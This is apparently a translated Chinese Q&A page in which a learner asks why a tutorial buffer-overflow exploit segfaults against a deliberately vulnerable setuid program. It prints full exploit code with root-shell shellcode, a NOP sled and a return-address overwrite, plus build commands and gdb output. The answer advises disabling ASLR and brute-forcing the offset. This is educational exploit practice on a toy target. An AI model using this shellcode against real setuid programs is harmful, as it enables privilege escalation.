1

我试图在 gcc 上的易受攻击的代码 vuln.c 上运行这个缓冲区溢出漏洞(我在一些教程中发现了这个,代码不是我的)。shellcode 产生了一个 shell。

exploit.c code

#include <stdlib.h>

char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

unsigned long sp(void)         // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer

int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;

offset = 0;            // Use an offset of 0
esp = sp();            // Put the current stack pointer into esp
ret = esp - offset;    // We want to overwrite the ret address

printf("Stack pointer (ESP) : 0x%x\n", esp);
printf("    Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);

// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);

// Fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }

// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }

// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }

// End the string
buffer[600-1] = 0;

// Now call the program ./vuln with our crafted buffer as its argument
execl("./vuln", "vuln", buffer, 0);

// Free the buffer memory
free(buffer);

return 0;
}

此漏洞针对易受攻击的代码 vuln.c:

int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}

但是当我使用 ./exploit 运行它时,它会给出分段错误而不是打开 shell。我使用了以下命令:

sudo chown root vuln
sudo chmod +s vuln
ls -l vuln
gcc -fno-stack-protector -o vuln vuln.c
./vuln
gcc -o exploit exploit.c
./exploit

它显示了结果:

(gdb) run
Starting program: /home/a/exploit 
Stack pointer (ESP) : 0xbffff338
Offset from ESP : 0x0
Desired Return Addr : 0xbffff338
process 4669 is executing new program: /home/a/vuln

Program received signal SIGSEGV, Segmentation fault.
0xbffff338 in ?? ()
(gdb) info registers
eax            0x0  0
ecx            0xbfe3f5a0   -1075579488
edx            0xbfe3dca8   -1075585880
ebx            0xb76e4ff4   -1217507340
esp            0xbfe3dc60   0xbfe3dc60
ebp            0xbffff338   0xbffff338
esi            0x0  0
edi            0x0  0
eip            0xbffff338   0xbffff338
eflags         0x10246  [ PF ZF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
(gdb)

请告诉我问题出在哪里...

4

1 回答 1

0

您的问题在于您要跳转到的地址....

该漏洞利用不使用内存泄漏,因此它应该在不支持 ASLR 的系统中运行。

一旦在你的系统中禁用了 ASLR,你必须运行漏洞利用 N 次,直到跳转到正确的 shellcode 地址......

函数 sp() 返回此进程的 esp,但它可能会根据回溯和进程而改变......所以你必须增加一个值直到到达正确的地址......

结论:

  • 禁用 ASLR
  • 添加每次迭代的偏移量,并在使用之前将其添加到 esp 值

祝你好运!!!!

于 2021-04-01T14:28:02.533 回答